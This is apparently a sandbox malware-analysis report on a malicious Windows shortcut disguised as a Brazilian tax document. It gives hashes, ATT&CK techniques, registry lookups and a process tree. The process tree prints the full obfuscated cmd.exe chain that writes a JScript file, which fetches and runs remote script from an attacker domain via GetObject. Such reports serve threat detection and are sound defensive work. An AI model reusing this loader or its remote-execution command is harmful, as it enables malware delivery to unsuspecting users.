673f0b91a82b59653bf18abff33c75a76d4347aa283e0282d176edeae2e42a79

Analysis

max time kernel
187s
max time network
192s
platform
windows10-2004_x64
resource
win10v2004-20221111-en
resource tags

arch:x64arch:x86image:win10v2004-20221111-enlocale:en-usos:windows10-2004-x64system
submitted
06/12/2022, 11:09

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

RelatorioIRPF2022x_763.59941234.894541.08054.lnk
Size

493B
MD5

5d675c77ace428b2959c9579f4e3605c
SHA1

b50d3aa98338a52c047a6cc0399046b8e65c8178
SHA256

0d43d8d11bc22acb24fd9b02ed43fa2e40ba29f07272d278a33d412782435119
SHA512

3ae5e8445781b77852fd6d6cdc07459e531865418a91f5a008dd0934ed160db26a4a39fb5c5ed725a9670cfe76ab34a2f61cf5a61278aeb49a7d4dd5c04c32a8

Score

8^/10

Malware Config

Signatures

Blocklisted process makes network request 3 IoCs

flow	pid	Process
31	1728	WScript.exe
35	1728	WScript.exe
36	1728	WScript.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\Control Panel\International\Geo\Nation	cmd.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\Control Panel\International\Geo\Nation	cmd.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000_Classes\Local Settings	cmd.exe

Suspicious use of WriteProcessMemory 8 IoCs

description	pid	Process	procid_target
PID 3196 wrote to memory of 3876	3196	cmd.exe	84
PID 3196 wrote to memory of 3876	3196	cmd.exe	84
PID 3876 wrote to memory of 2560	3876	cmd.exe	85
PID 3876 wrote to memory of 2560	3876	cmd.exe	85
PID 3876 wrote to memory of 656	3876	cmd.exe	86
PID 3876 wrote to memory of 656	3876	cmd.exe	86
PID 656 wrote to memory of 1728	656	cmd.exe	87
PID 656 wrote to memory of 1728	656	cmd.exe	87

C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\RelatorioIRPF2022x_763.59941234.894541.08054.lnk
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3196
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /V/D/c "md C:\ZUn9AOQ\&&s^eT SBFF=C:\ZUn9AOQ\^ZUn9AOQ&&S^Et NGOR=v2C7ar CDl3="sc"+"^r";DDl3="i^p"+"t^:2C7h";EDl3="T"+"t^P"+":";G2C7et^Ob^j2C7ec^t(CDl3+DDl3+EDl3+'&&s^ET E67=HTXCAHTXCAwaew.tnemllorne.cyouHTXCA?1HTXCA');&&s^Et/^p V8JJ="!NGOR:2C7=!!E67:HTXCA=/!"<n^ul > !SBFF!.^jS|ca^ll c^a^ll !SBFF!.jS"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3876
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" sEt/p V8JJ="var CDl3="sc"+"^r";DDl3="i^p"+"t^:h";EDl3="T"+"t^P"+":";GetObject(CDl3+DDl3+EDl3+'//waew.tnemllorne.cyou/?1/');" 0<nul 1>C:\ZUn9AOQ\ZUn9AOQ.jS"
    3⤵
    PID:2560
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" call call C:\ZUn9AOQ\ZUn9AOQ.jS "
    3⤵
    - Checks computer location settings
    - Modifies registry class
    - Suspicious use of WriteProcessMemory
    PID:656
  - - C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\ZUn9AOQ\ZUn9AOQ.jS"
      4⤵
      Blocklisted process makes network request
      PID:1728

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ZUn9AOQ\ZUn9AOQ.jS

Filesize
107B

MD5
29cf655d6b28293d388268e308f7b554

SHA1
d43da5881b3968e81ba3e5e61f580c5f860302d9

SHA256
776fee39e41f81d10fa08c53fedf90716c97b5483d158c2fdbd5053a85e6d207

SHA512
eeabd784e408e4f62e35994e89acb5c94418548b4ba56b4ebaf2c15891a04aa587b32c1ac3449cbe58e5525d536890c0d17f754bf36ca00725461b9068d9d0df

Download Submit